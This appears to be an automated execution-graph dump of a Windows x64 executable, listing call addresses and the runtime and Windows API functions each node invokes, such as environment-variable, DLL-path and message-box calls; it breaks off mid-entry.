                                                                                                                                                                                                                                                            execution_graph 19138 7ff72aa8a4d1 19139 7ff72aa8af48 45 API calls 19138->19139 19140 7ff72aa8a4d6 19139->19140 19141 7ff72aa8a547 19140->19141 19142 7ff72aa8a4fd GetModuleHandleW 19140->19142 19150 7ff72aa8a3d4 19141->19150 19142->19141 19148 7ff72aa8a50a 19142->19148 19148->19141 19164 7ff72aa8a5f8 GetModuleHandleExW 19148->19164 19170 7ff72aa91298 EnterCriticalSection 19150->19170 19165 7ff72aa8a655 19164->19165 19166 7ff72aa8a62c GetProcAddress 19164->19166 19167 7ff72aa8a661 19165->19167 19168 7ff72aa8a65a FreeLibrary 19165->19168 19169 7ff72aa8a63e 19166->19169 19167->19141 19168->19167 19169->19165 19181 7ff72aa7b0cc 19182 7ff72aa7a3ca 19181->19182 19184 7ff72aa7a446 19182->19184 19185 7ff72aa7b640 19182->19185 19186 7ff72aa7b663 19185->19186 19187 7ff72aa7b67f memcpy_s 19185->19187 19188 7ff72aa8e19c 12 API calls 19186->19188 19187->19184 19188->19187 19189 7ff72aa902cc 19190 7ff72aa904be 19189->19190 19192 7ff72aa9030e _isindst 19189->19192 19191 7ff72aa85aa4 memcpy_s 11 API calls 19190->19191 19209 7ff72aa904ae 19191->19209 19192->19190 19195 7ff72aa9038e _isindst 19192->19195 19193 7ff72aa7be00 _wfindfirst32i64 8 API calls 19194 7ff72aa904d9 19193->19194 19210 7ff72aa96ee4 19195->19210 19200 7ff72aa904ea 19202 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 19200->19202 19204 7ff72aa904fe 19202->19204 19207 7ff72aa903eb 19207->19209 19234 7ff72aa96f28 19207->19234 19209->19193 19211 7ff72aa903ac 19210->19211 19212 7ff72aa96ef3 19210->19212 19216 7ff72aa962e8 19211->19216 19241 7ff72aa91298 EnterCriticalSection 19212->19241 19217 7ff72aa962f1 19216->19217 19218 7ff72aa903c1 19216->19218 19219 7ff72aa85aa4 memcpy_s 11 API calls 19217->19219 19218->19200 19222 7ff72aa96318 19218->19222 19220 7ff72aa962f6 19219->19220 19221 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19220->19221 19221->19218 19223 7ff72aa96321 19222->19223 19227 7ff72aa903d2 19222->19227 19224 7ff72aa85aa4 memcpy_s 11 API calls 19223->19224 19225 7ff72aa96326 19224->19225 19226 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19225->19226 19226->19227 19227->19200 19228 7ff72aa96348 19227->19228 19229 7ff72aa96351 19228->19229 19230 7ff72aa903e3 19228->19230 19231 7ff72aa85aa4 memcpy_s 11 API calls 19229->19231 19230->19200 19230->19207 19232 7ff72aa96356 19231->19232 19233 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 19232->19233 19233->19230 19242 7ff72aa91298 EnterCriticalSection 19234->19242 20472 7ff72aa7c0d0 20473 7ff72aa7c0e0 20472->20473 20489 7ff72aa8a718 20473->20489 20475 7ff72aa7c0ec 20495 7ff72aa7c3c8 20475->20495 20477 7ff72aa7c6ac 7 API calls 20479 7ff72aa7c185 20477->20479 20478 7ff72aa7c104 _RTC_Initialize 20487 7ff72aa7c159 20478->20487 20500 7ff72aa7c578 20478->20500 20481 7ff72aa7c119 20503 7ff72aa89b84 20481->20503 20487->20477 20488 7ff72aa7c175 20487->20488 20490 7ff72aa8a729 20489->20490 20491 7ff72aa85aa4 memcpy_s 11 API calls 20490->20491 20492 7ff72aa8a731 20490->20492 20493 7ff72aa8a740 20491->20493 20492->20475 20494 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 20493->20494 20494->20492 20496 7ff72aa7c3d9 20495->20496 20499 7ff72aa7c3de __scrt_acquire_startup_lock 20495->20499 20497 7ff72aa7c6ac 7 API calls 20496->20497 20496->20499 20498 7ff72aa7c452 20497->20498 20499->20478 20528 7ff72aa7c53c 20500->20528 20502 7ff72aa7c581 20502->20481 20504 7ff72aa7c125 20503->20504 20505 7ff72aa89ba4 20503->20505 20504->20487 20527 7ff72aa7c64c InitializeSListHead 20504->20527 20506 7ff72aa89bc2 GetModuleFileNameW 20505->20506 20507 7ff72aa89bac 20505->20507 20511 7ff72aa89bed 20506->20511 20508 7ff72aa85aa4 memcpy_s 11 API calls 20507->20508 20509 7ff72aa89bb1 20508->20509 20510 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 20509->20510 20510->20504 20543 7ff72aa89b24 20511->20543 20514 7ff72aa89c35 20515 7ff72aa85aa4 memcpy_s 11 API calls 20514->20515 20516 7ff72aa89c3a 20515->20516 20517 7ff72aa8b4ec __free_lconv_num 11 API calls 20516->20517 20517->20504 20518 7ff72aa89c6f 20520 7ff72aa8b4ec __free_lconv_num 11 API calls 20518->20520 20519 7ff72aa89c4d 20519->20518 20521 7ff72aa89cb4 20519->20521 20522 7ff72aa89c9b 20519->20522 20520->20504 20525 7ff72aa8b4ec __free_lconv_num 11 API calls 20521->20525 20523 7ff72aa8b4ec __free_lconv_num 11 API calls 20522->20523 20524 7ff72aa89ca4 20523->20524 20526 7ff72aa8b4ec __free_lconv_num 11 API calls 20524->20526 20525->20518 20526->20504 20529 7ff72aa7c556 20528->20529 20530 7ff72aa7c54f 20528->20530 20532 7ff72aa8ad5c 20529->20532 20530->20502 20535 7ff72aa8a998 20532->20535 20542 7ff72aa91298 EnterCriticalSection 20535->20542 20544 7ff72aa89b74 20543->20544 20545 7ff72aa89b3c 20543->20545 20544->20514 20544->20519 20545->20544 20546 7ff72aa8f738 memcpy_s 11 API calls 20545->20546 20547 7ff72aa89b6a 20546->20547 20548 7ff72aa8b4ec __free_lconv_num 11 API calls 20547->20548 20548->20544 20549 7ff72aa8a8c0 20552 7ff72aa8a83c 20549->20552 20559 7ff72aa91298 EnterCriticalSection 20552->20559 20560 7ff72aa8d0c0 20571 7ff72aa91298 EnterCriticalSection 20560->20571 16079 7ff72aa7c1bc 16100 7ff72aa7c38c 16079->16100 16082 7ff72aa7c308 16200 7ff72aa7c6ac IsProcessorFeaturePresent 16082->16200 16083 7ff72aa7c1d8 __scrt_acquire_startup_lock 16085 7ff72aa7c312 16083->16085 16090 7ff72aa7c1f6 __scrt_release_startup_lock 16083->16090 16086 7ff72aa7c6ac 7 API calls 16085->16086 16088 7ff72aa7c31d __CxxCallCatchBlock 16086->16088 16087 7ff72aa7c21b 16089 7ff72aa7c2a1 16106 7ff72aa7c7f4 16089->16106 16090->16087 16090->16089 16189 7ff72aa8a69c 16090->16189 16092 7ff72aa7c2a6 16109 7ff72aa71000 16092->16109 16097 7ff72aa7c2c9 16097->16088 16196 7ff72aa7c510 16097->16196 16101 7ff72aa7c394 16100->16101 16102 7ff72aa7c3a0 __scrt_dllmain_crt_thread_attach 16101->16102 16103 7ff72aa7c3ad 16102->16103 16105 7ff72aa7c1d0 16102->16105 16103->16105 16207 7ff72aa7cfb0 16103->16207 16105->16082 16105->16083 16234 7ff72aa9b380 16106->16234 16108 7ff72aa7c80b GetStartupInfoW 16108->16092 16110 7ff72aa7100b 16109->16110 16236 7ff72aa787a0 16110->16236 16112 7ff72aa7101d 16243 7ff72aa864d8 16112->16243 16114 7ff72aa739ab 16250 7ff72aa71ea0 16114->16250 16120 7ff72aa739ca 16187 7ff72aa73ab2 16120->16187 16266 7ff72aa77b60 16120->16266 16122 7ff72aa739ff 16123 7ff72aa73a4b 16122->16123 16125 7ff72aa77b60 61 API calls 16122->16125 16281 7ff72aa78040 16123->16281 16130 7ff72aa73a20 __vcrt_freefls 16125->16130 16126 7ff72aa73a60 16285 7ff72aa71ca0 16126->16285 16129 7ff72aa73b2d 16132 7ff72aa73b8d 16129->16132 16304 7ff72aa78970 16129->16304 16130->16123 16133 7ff72aa78040 58 API calls 16130->16133 16131 7ff72aa71ca0 121 API calls 16134 7ff72aa73a96 16131->16134 16137 7ff72aa73bdb 16132->16137 16132->16187 16328 7ff72aa78bd0 16132->16328 16133->16123 16135 7ff72aa73a9a 16134->16135 16136 7ff72aa73ab7 16134->16136 16404 7ff72aa72b10 16135->16404 16136->16129 16417 7ff72aa73fc0 16136->16417 16342 7ff72aa76de0 16137->16342 16140 7ff72aa73bc0 16145 7ff72aa73bce SetDllDirectoryW 16140->16145 16146 7ff72aa73b53 16140->16146 16145->16137 16151 7ff72aa72b10 59 API calls 16146->16151 16150 7ff72aa73ad5 16157 7ff72aa72b10 59 API calls 16150->16157 16151->16187 16154 7ff72aa73bf5 16179 7ff72aa73c27 16154->16179 16458 7ff72aa765f0 16154->16458 16155 7ff72aa73b03 16155->16129 16158 7ff72aa73b08 16155->16158 16156 7ff72aa73ce6 16346 7ff72aa734a0 16156->16346 16157->16187 16436 7ff72aa8076c 16158->16436 16164 7ff72aa73c46 16171 7ff72aa73c88 16164->16171 16494 7ff72aa71ee0 16164->16494 16165 7ff72aa73c29 16166 7ff72aa76840 FreeLibrary 16165->16166 16166->16179 16170 7ff72aa73d00 16354 7ff72aa77fd0 16170->16354 16171->16187 16498 7ff72aa73440 16171->16498 16177 7ff72aa73d13 16180 7ff72aa77b60 61 API calls 16177->16180 16178 7ff72aa73cc1 16182 7ff72aa76840 FreeLibrary 16178->16182 16179->16156 16179->16164 16181 7ff72aa73d1f 16180->16181 16361 7ff72aa78080 16181->16361 16182->16187 16440 7ff72aa7be00 16187->16440 16190 7ff72aa8a6b3 16189->16190 16191 7ff72aa8a6d4 16189->16191 16190->16089 19133 7ff72aa8af48 16191->19133 16194 7ff72aa7c838 GetModuleHandleW 16195 7ff72aa7c849 16194->16195 16195->16097 16197 7ff72aa7c521 16196->16197 16198 7ff72aa7c2e0 16197->16198 16199 7ff72aa7cfb0 7 API calls 16197->16199 16198->16087 16199->16198 16201 7ff72aa7c6d2 _wfindfirst32i64 memcpy_s 16200->16201 16202 7ff72aa7c6f1 RtlCaptureContext RtlLookupFunctionEntry 16201->16202 16203 7ff72aa7c71a RtlVirtualUnwind 16202->16203 16204 7ff72aa7c756 memcpy_s 16202->16204 16203->16204 16205 7ff72aa7c788 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16204->16205 16206 7ff72aa7c7d6 _wfindfirst32i64 16205->16206 16206->16085 16208 7ff72aa7cfb8 16207->16208 16209 7ff72aa7cfc2 16207->16209 16213 7ff72aa7d354 16208->16213 16209->16105 16214 7ff72aa7d363 16213->16214 16215 7ff72aa7cfbd 16213->16215 16221 7ff72aa7e350 16214->16221 16217 7ff72aa7d3c0 16215->16217 16218 7ff72aa7d3eb 16217->16218 16219 7ff72aa7d3ce DeleteCriticalSection 16218->16219 16220 7ff72aa7d3ef 16218->16220 16219->16218 16220->16209 16225 7ff72aa7e1b8 16221->16225 16226 7ff72aa7e2a2 TlsFree 16225->16226 16228 7ff72aa7e1fc __vcrt_InitializeCriticalSectionEx 16225->16228 16227 7ff72aa7e22a LoadLibraryExW 16230 7ff72aa7e24b GetLastError 16227->16230 16231 7ff72aa7e2c9 16227->16231 16228->16226 16228->16227 16229 7ff72aa7e2e9 GetProcAddress 16228->16229 16233 7ff72aa7e26d LoadLibraryExW 16228->16233 16229->16226 16230->16228 16231->16229 16232 7ff72aa7e2e0 FreeLibrary 16231->16232 16232->16229 16233->16228 16233->16231 16235 7ff72aa9b370 16234->16235 16235->16108 16235->16235 16238 7ff72aa787bf 16236->16238 16237 7ff72aa78810 WideCharToMultiByte 16237->16238 16241 7ff72aa788b6 16237->16241 16238->16237 16240 7ff72aa78864 WideCharToMultiByte 16238->16240 16238->16241 16242 7ff72aa787c7 __vcrt_freefls 16238->16242 16240->16238 16240->16241 16532 7ff72aa729c0 16241->16532 16242->16112 16245 7ff72aa90630 16243->16245 16244 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16249 7ff72aa906ac 16244->16249 16246 7ff72aa906d6 16245->16246 16248 7ff72aa90683 16245->16248 17037 7ff72aa90508 16246->17037 16248->16244 16249->16114 16251 7ff72aa71eb5 16250->16251 16252 7ff72aa71ed0 16251->16252 17045 7ff72aa72870 16251->17045 16252->16187 16254 7ff72aa73eb0 16252->16254 16255 7ff72aa7bda0 16254->16255 16256 7ff72aa73ebc GetModuleFileNameW 16255->16256 16257 7ff72aa73eeb 16256->16257 16258 7ff72aa73f02 16256->16258 16259 7ff72aa729c0 57 API calls 16257->16259 17085 7ff72aa78ce0 16258->17085 16261 7ff72aa73efe 16259->16261 16263 7ff72aa7be00 _wfindfirst32i64 8 API calls 16261->16263 16265 7ff72aa73f3f 16263->16265 16264 7ff72aa72b10 59 API calls 16264->16261 16265->16120 16267 7ff72aa77b6a 16266->16267 16268 7ff72aa78bd0 57 API calls 16267->16268 16269 7ff72aa77b8c GetEnvironmentVariableW 16268->16269 16270 7ff72aa77bf6 16269->16270 16271 7ff72aa77ba4 ExpandEnvironmentStringsW 16269->16271 16272 7ff72aa7be00 _wfindfirst32i64 8 API calls 16270->16272 16273 7ff72aa78ce0 59 API calls 16271->16273 16274 7ff72aa77c08 16272->16274 16275 7ff72aa77bcc 16273->16275 16274->16122 16275->16270 16276 7ff72aa77bd6 16275->16276 17096 7ff72aa8af7c 16276->17096 16279 7ff72aa7be00 _wfindfirst32i64 8 API calls 16280 7ff72aa77bee 16279->16280 16280->16122 16282 7ff72aa78bd0 57 API calls 16281->16282 16283 7ff72aa78057 SetEnvironmentVariableW 16282->16283 16284 7ff72aa7806f __vcrt_freefls 16283->16284 16284->16126 16286 7ff72aa71cae 16285->16286 16287 7ff72aa71ee0 49 API calls 16286->16287 16288 7ff72aa71ce4 16287->16288 16289 7ff72aa71ee0 49 API calls 16288->16289 16298 7ff72aa71dce 16288->16298 16290 7ff72aa71d0a 16289->16290 16290->16298 17103 7ff72aa71a90 16290->17103 16291 7ff72aa7be00 _wfindfirst32i64 8 API calls 16292 7ff72aa71e5c 16291->16292 16292->16129 16292->16131 16296 7ff72aa71dbc 16297 7ff72aa73e30 49 API calls 16296->16297 16297->16298 16298->16291 16299 7ff72aa71d7f 16299->16296 16300 7ff72aa71e24 16299->16300 16301 7ff72aa73e30 49 API calls 16300->16301 16302 7ff72aa71e31 16301->16302 17139 7ff72aa74040 16302->17139 16305 7ff72aa78985 16304->16305 17181 7ff72aa78650 GetCurrentProcess OpenProcessToken 16305->17181 16308 7ff72aa78650 7 API calls 16309 7ff72aa789b1 16308->16309 16310 7ff72aa789ca 16309->16310 16311 7ff72aa789e4 16309->16311 17191 7ff72aa78740 16310->17191 16312 7ff72aa78740 48 API calls 16311->16312 16314 7ff72aa789f7 LocalFree LocalFree 16312->16314 16316 7ff72aa78a13 16314->16316 16318 7ff72aa78a1f 16314->16318 17195 7ff72aa72c30 16316->17195 16319 7ff72aa7be00 _wfindfirst32i64 8 API calls 16318->16319 16320 7ff72aa73b4e 16319->16320 16320->16146 16321 7ff72aa714e0 16320->16321 16322 7ff72aa714f6 16321->16322 16325 7ff72aa7156f 16321->16325 17402 7ff72aa77950 16322->17402 16325->16132 16329 7ff72aa78c77 MultiByteToWideChar 16328->16329 16330 7ff72aa78bf1 MultiByteToWideChar 16328->16330 16333 7ff72aa78c9a 16329->16333 16334 7ff72aa78cbf 16329->16334 16331 7ff72aa78c3c 16330->16331 16332 7ff72aa78c17 16330->16332 16331->16329 16339 7ff72aa78c52 16331->16339 16335 7ff72aa729c0 55 API calls 16332->16335 16336 7ff72aa729c0 55 API calls 16333->16336 16334->16140 16337 7ff72aa78c2a 16335->16337 16338 7ff72aa78cad 16336->16338 16337->16140 16338->16140 16340 7ff72aa729c0 55 API calls 16339->16340 16341 7ff72aa78c65 16340->16341 16341->16140 16343 7ff72aa76df5 16342->16343 16344 7ff72aa73be0 16343->16344 16345 7ff72aa72870 59 API calls 16343->16345 16344->16179 16449 7ff72aa76a90 16344->16449 16345->16344 16347 7ff72aa73513 16346->16347 16352 7ff72aa73554 16346->16352 16347->16352 17734 7ff72aa71700 16347->17734 17776 7ff72aa72d50 16347->17776 16348 7ff72aa7be00 _wfindfirst32i64 8 API calls 16349 7ff72aa735a5 16348->16349 16349->16187 16353 7ff72aa78940 LocalFree 16349->16353 16352->16348 16353->16170 16355 7ff72aa78bd0 57 API calls 16354->16355 16356 7ff72aa77fef 16355->16356 16357 7ff72aa78bd0 57 API calls 16356->16357 16358 7ff72aa77fff 16357->16358 16359 7ff72aa883cc 38 API calls 16358->16359 16360 7ff72aa7800d __vcrt_freefls 16359->16360 16360->16177 16362 7ff72aa78090 16361->16362 16405 7ff72aa72b30 16404->16405 16406 7ff72aa850a4 49 API calls 16405->16406 16407 7ff72aa72b7b memcpy_s 16406->16407 16408 7ff72aa78bd0 57 API calls 16407->16408 16409 7ff72aa72bb0 16408->16409 16410 7ff72aa72bed MessageBoxA 16409->16410 16411 7ff72aa72bb5 16409->16411 16412 7ff72aa72c07 16410->16412 16413 7ff72aa78bd0 57 API calls 16411->16413 16414 7ff72aa7be00 _wfindfirst32i64 8 API calls 16412->16414 16415 7ff72aa72bcf MessageBoxW 16413->16415 16416 7ff72aa72c17 16414->16416 16415->16412 16416->16187 16418 7ff72aa73fcc 16417->16418 16419 7ff72aa78bd0 57 API calls 16418->16419 16420 7ff72aa73ff7 16419->16420 16421 7ff72aa78bd0 57 API calls 16420->16421 16422 7ff72aa7400a 16421->16422 18309 7ff72aa86a88 16422->18309 16425 7ff72aa7be00 _wfindfirst32i64 8 API calls 16426 7ff72aa73acd 16425->16426 16426->16150 16427 7ff72aa782b0 16426->16427 16428 7ff72aa782d4 16427->16428 16429 7ff72aa80df4 73 API calls 16428->16429 16434 7ff72aa783ab __vcrt_freefls 16428->16434 16430 7ff72aa782ee 16429->16430 16430->16434 18688 7ff72aa89650 16430->18688 16434->16155 16437 7ff72aa8079c 16436->16437 18703 7ff72aa80548 16437->18703 16441 7ff72aa7be09 16440->16441 16442 7ff72aa73b73 16441->16442 16443 7ff72aa7be60 IsProcessorFeaturePresent 16441->16443 16442->16194 16444 7ff72aa7be78 16443->16444 18714 7ff72aa7c054 RtlCaptureContext 16444->18714 16450 7ff72aa76aca 16449->16450 16451 7ff72aa76ab3 16449->16451 16450->16154 16451->16450 18719 7ff72aa71590 16451->18719 16453 7ff72aa76ad4 16453->16450 16454 7ff72aa74040 49 API calls 16453->16454 16455 7ff72aa76b35 16454->16455 16456 7ff72aa72b10 59 API calls 16455->16456 16457 7ff72aa76ba5 memcpy_s __vcrt_freefls 16455->16457 16456->16450 16457->16154 16471 7ff72aa7660a memcpy_s 16458->16471 16460 7ff72aa7672f 16462 7ff72aa74040 49 API calls 16460->16462 16461 7ff72aa7674b 16463 7ff72aa72b10 59 API calls 16461->16463 16464 7ff72aa767a8 16462->16464 16469 7ff72aa76741 __vcrt_freefls 16463->16469 16467 7ff72aa74040 49 API calls 16464->16467 16465 7ff72aa74040 49 API calls 16465->16471 16466 7ff72aa76710 16466->16460 16470 7ff72aa74040 49 API calls 16466->16470 16468 7ff72aa767d8 16467->16468 16474 7ff72aa74040 49 API calls 16468->16474 16472 7ff72aa7be00 _wfindfirst32i64 8 API calls 16469->16472 16470->16460 16471->16460 16471->16461 16471->16465 16471->16466 16471->16471 16475 7ff72aa71700 135 API calls 16471->16475 16476 7ff72aa76731 16471->16476 18743 7ff72aa71940 16471->18743 16473 7ff72aa73c06 16472->16473 16473->16165 16478 7ff72aa76570 16473->16478 16474->16469 16475->16471 16477 7ff72aa72b10 59 API calls 16476->16477 16477->16469 18747 7ff72aa78260 16478->18747 16480 7ff72aa7658c 16481 7ff72aa78260 58 API calls 16480->16481 16482 7ff72aa7659f 16481->16482 16483 7ff72aa765d5 16482->16483 16485 7ff72aa765b7 16482->16485 16484 7ff72aa72b10 59 API calls 16483->16484 18751 7ff72aa76ef0 GetProcAddress 16485->18751 16495 7ff72aa71f05 16494->16495 16496 7ff72aa850a4 49 API calls 16495->16496 16497 7ff72aa71f28 16496->16497 16497->16171 18810 7ff72aa75bc0 16498->18810 16501 7ff72aa7348d 16501->16178 16551 7ff72aa7bda0 16532->16551 16535 7ff72aa72a09 16553 7ff72aa850a4 16535->16553 16540 7ff72aa71ee0 49 API calls 16541 7ff72aa72a66 memcpy_s 16540->16541 16542 7ff72aa78bd0 54 API calls 16541->16542 16543 7ff72aa72a9b 16542->16543 16544 7ff72aa72ad8 MessageBoxA 16543->16544 16545 7ff72aa72aa0 16543->16545 16547 7ff72aa72af2 16544->16547 16546 7ff72aa78bd0 54 API calls 16545->16546 16548 7ff72aa72aba MessageBoxW 16546->16548 16549 7ff72aa7be00 _wfindfirst32i64 8 API calls 16547->16549 16548->16547 16550 7ff72aa72b02 16549->16550 16550->16242 16552 7ff72aa729dc GetLastError 16551->16552 16552->16535 16554 7ff72aa850fe 16553->16554 16555 7ff72aa85123 16554->16555 16557 7ff72aa8515f 16554->16557 16583 7ff72aa8b3b8 16555->16583 16591 7ff72aa83330 16557->16591 16559 7ff72aa8514d 16561 7ff72aa7be00 _wfindfirst32i64 8 API calls 16559->16561 16563 7ff72aa72a37 16561->16563 16562 7ff72aa8b4ec __free_lconv_num 11 API calls 16562->16559 16571 7ff72aa78560 16563->16571 16564 7ff72aa8523c 16564->16562 16565 7ff72aa85211 16605 7ff72aa8b4ec 16565->16605 16566 7ff72aa85260 16566->16564 16568 7ff72aa8526a 16566->16568 16567 7ff72aa85208 16567->16564 16567->16565 16570 7ff72aa8b4ec __free_lconv_num 11 API calls 16568->16570 16570->16559 16572 7ff72aa7856c 16571->16572 16573 7ff72aa7858d FormatMessageW 16572->16573 16574 7ff72aa78587 GetLastError 16572->16574 16575 7ff72aa785dc WideCharToMultiByte 16573->16575 16576 7ff72aa785c0 16573->16576 16574->16573 16578 7ff72aa78616 16575->16578 16579 7ff72aa785d3 16575->16579 16577 7ff72aa729c0 54 API calls 16576->16577 16577->16579 16580 7ff72aa729c0 54 API calls 16578->16580 16581 7ff72aa7be00 _wfindfirst32i64 8 API calls 16579->16581 16580->16579 16582 7ff72aa72a3e 16581->16582 16582->16540 16611 7ff72aa8b100 16583->16611 16588 7ff72aa8b3f3 16588->16559 16592 7ff72aa8336e 16591->16592 16597 7ff72aa8335e 16591->16597 16593 7ff72aa83377 16592->16593 16603 7ff72aa833a5 16592->16603 16596 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16593->16596 16594 7ff72aa8339d 16594->16564 16594->16565 16594->16566 16594->16567 16595 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16595->16594 16596->16594 16597->16595 16600 7ff72aa83654 16602 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16600->16602 16602->16597 16603->16594 16603->16597 16603->16600 16703 7ff72aa83cc0 16603->16703 16729 7ff72aa83988 16603->16729 16759 7ff72aa83210 16603->16759 16762 7ff72aa84ee0 16603->16762 16606 7ff72aa8b4f1 RtlRestoreThreadPreferredUILanguages 16605->16606 16610 7ff72aa8b520 16605->16610 16607 7ff72aa8b50c GetLastError 16606->16607 16606->16610 16608 7ff72aa8b519 __free_lconv_num 16607->16608 16609 7ff72aa85aa4 memcpy_s 9 API calls 16608->16609 16609->16610 16610->16559 16612 7ff72aa8b157 16611->16612 16613 7ff72aa8b11c GetLastError 16611->16613 16612->16588 16617 7ff72aa8b16c 16612->16617 16614 7ff72aa8b12c 16613->16614 16624 7ff72aa8bf30 16614->16624 16618 7ff72aa8b1a0 16617->16618 16619 7ff72aa8b188 GetLastError SetLastError 16617->16619 16618->16588 16620 7ff72aa8b4a4 IsProcessorFeaturePresent 16618->16620 16619->16618 16621 7ff72aa8b4b7 16620->16621 16695 7ff72aa8b1b8 16621->16695 16625 7ff72aa8bf4f FlsGetValue 16624->16625 16626 7ff72aa8bf6a FlsSetValue 16624->16626 16627 7ff72aa8bf64 16625->16627 16629 7ff72aa8b147 SetLastError 16625->16629 16628 7ff72aa8bf77 16626->16628 16626->16629 16627->16626 16641 7ff72aa8f738 16628->16641 16629->16612 16632 7ff72aa8bfa4 FlsSetValue 16635 7ff72aa8bfb0 FlsSetValue 16632->16635 16636 7ff72aa8bfc2 16632->16636 16633 7ff72aa8bf94 FlsSetValue 16634 7ff72aa8bf9d 16633->16634 16637 7ff72aa8b4ec __free_lconv_num 11 API calls 16634->16637 16635->16634 16648 7ff72aa8ba98 16636->16648 16637->16629 16646 7ff72aa8f749 memcpy_s 16641->16646 16642 7ff72aa8f79a 16656 7ff72aa85aa4 16642->16656 16643 7ff72aa8f77e RtlAllocateHeap 16644 7ff72aa8bf86 16643->16644 16643->16646 16644->16632 16644->16633 16646->16642 16646->16643 16653 7ff72aa941e0 16646->16653 16681 7ff72aa8b970 16648->16681 16659 7ff72aa94220 16653->16659 16664 7ff72aa8be68 GetLastError 16656->16664 16658 7ff72aa85aad 16658->16644 16660 7ff72aa91298 _isindst EnterCriticalSection 16659->16660 16661 7ff72aa9422d 16660->16661 16662 7ff72aa912f8 _isindst LeaveCriticalSection 16661->16662 16663 7ff72aa941f2 16662->16663 16663->16646 16665 7ff72aa8bea9 FlsSetValue 16664->16665 16667 7ff72aa8be8c 16664->16667 16666 7ff72aa8bebb 16665->16666 16678 7ff72aa8be99 16665->16678 16669 7ff72aa8f738 memcpy_s 5 API calls 16666->16669 16667->16665 16667->16678 16668 7ff72aa8bf15 SetLastError 16668->16658 16670 7ff72aa8beca 16669->16670 16671 7ff72aa8bee8 FlsSetValue 16670->16671 16672 7ff72aa8bed8 FlsSetValue 16670->16672 16674 7ff72aa8bef4 FlsSetValue 16671->16674 16675 7ff72aa8bf06 16671->16675 16673 7ff72aa8bee1 16672->16673 16676 7ff72aa8b4ec __free_lconv_num 5 API calls 16673->16676 16674->16673 16677 7ff72aa8ba98 memcpy_s 5 API calls 16675->16677 16676->16678 16679 7ff72aa8bf0e 16677->16679 16678->16668 16680 7ff72aa8b4ec __free_lconv_num 5 API calls 16679->16680 16680->16668 16693 7ff72aa91298 EnterCriticalSection 16681->16693 16696 7ff72aa8b1f2 _wfindfirst32i64 memcpy_s 16695->16696 16697 7ff72aa8b21a RtlCaptureContext RtlLookupFunctionEntry 16696->16697 16698 7ff72aa8b254 RtlVirtualUnwind 16697->16698 16699 7ff72aa8b28a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16697->16699 16698->16699 16700 7ff72aa8b2dc _wfindfirst32i64 16699->16700 16701 7ff72aa7be00 _wfindfirst32i64 8 API calls 16700->16701 16702 7ff72aa8b2fb GetCurrentProcess TerminateProcess 16701->16702 16704 7ff72aa83d75 16703->16704 16705 7ff72aa83d02 16703->16705 16706 7ff72aa83d7a 16704->16706 16707 7ff72aa83dcf 16704->16707 16708 7ff72aa83d08 16705->16708 16709 7ff72aa83d9f 16705->16709 16710 7ff72aa83d7c 16706->16710 16711 7ff72aa83daf 16706->16711 16707->16709 16719 7ff72aa83dde 16707->16719 16727 7ff72aa83d38 16707->16727 16715 7ff72aa83d0d 16708->16715 16708->16719 16786 7ff72aa82270 16709->16786 16718 7ff72aa83d8b 16710->16718 16720 7ff72aa83d1d 16710->16720 16793 7ff72aa81e60 16711->16793 16717 7ff72aa83d50 16715->16717 16715->16720 16715->16727 16728 7ff72aa83e0d 16717->16728 16778 7ff72aa84ae0 16717->16778 16718->16709 16721 7ff72aa83d90 16718->16721 16719->16728 16800 7ff72aa82680 16719->16800 16720->16728 16768 7ff72aa84624 16720->16768 16721->16728 16782 7ff72aa84c78 16721->16782 16723 7ff72aa7be00 _wfindfirst32i64 8 API calls 16725 7ff72aa840a3 16723->16725 16725->16603 16727->16728 16807 7ff72aa8f3f8 16727->16807 16728->16723 16730 7ff72aa839a9 16729->16730 16731 7ff72aa83993 16729->16731 16732 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16730->16732 16733 7ff72aa839e7 16730->16733 16731->16733 16734 7ff72aa83d75 16731->16734 16735 7ff72aa83d02 16731->16735 16732->16733 16733->16603 16736 7ff72aa83d7a 16734->16736 16737 7ff72aa83dcf 16734->16737 16738 7ff72aa83d08 16735->16738 16739 7ff72aa83d9f 16735->16739 16740 7ff72aa83d7c 16736->16740 16741 7ff72aa83daf 16736->16741 16737->16739 16748 7ff72aa83dde 16737->16748 16756 7ff72aa83d38 16737->16756 16746 7ff72aa83d0d 16738->16746 16738->16748 16743 7ff72aa82270 38 API calls 16739->16743 16742 7ff72aa83d1d 16740->16742 16750 7ff72aa83d8b 16740->16750 16744 7ff72aa81e60 38 API calls 16741->16744 16745 7ff72aa84624 47 API calls 16742->16745 16758 7ff72aa83e0d 16742->16758 16743->16756 16744->16756 16745->16756 16746->16742 16747 7ff72aa83d50 16746->16747 16746->16756 16751 7ff72aa84ae0 47 API calls 16747->16751 16747->16758 16749 7ff72aa82680 38 API calls 16748->16749 16748->16758 16749->16756 16750->16739 16752 7ff72aa83d90 16750->16752 16751->16756 16754 7ff72aa84c78 37 API calls 16752->16754 16752->16758 16753 7ff72aa7be00 _wfindfirst32i64 8 API calls 16755 7ff72aa840a3 16753->16755 16754->16756 16755->16603 16757 7ff72aa8f3f8 47 API calls 16756->16757 16756->16758 16757->16756 16758->16753 16965 7ff72aa81434 16759->16965 16763 7ff72aa84ef7 16762->16763 16982 7ff72aa8e558 16763->16982 16769 7ff72aa84646 16768->16769 16817 7ff72aa812a0 16769->16817 16774 7ff72aa84783 16775 7ff72aa8480c 16774->16775 16777 7ff72aa84ee0 45 API calls 16774->16777 16775->16727 16776 7ff72aa84ee0 45 API calls 16776->16774 16777->16775 16779 7ff72aa84b60 16778->16779 16780 7ff72aa84af8 16778->16780 16779->16727 16780->16779 16781 7ff72aa8f3f8 47 API calls 16780->16781 16781->16779 16785 7ff72aa84c99 16782->16785 16783 7ff72aa8b3b8 _invalid_parameter_noinfo 37 API calls 16784 7ff72aa84cca 16783->16784 16784->16727 16785->16783 16785->16784 16787 7ff72aa822a3 16786->16787 16788 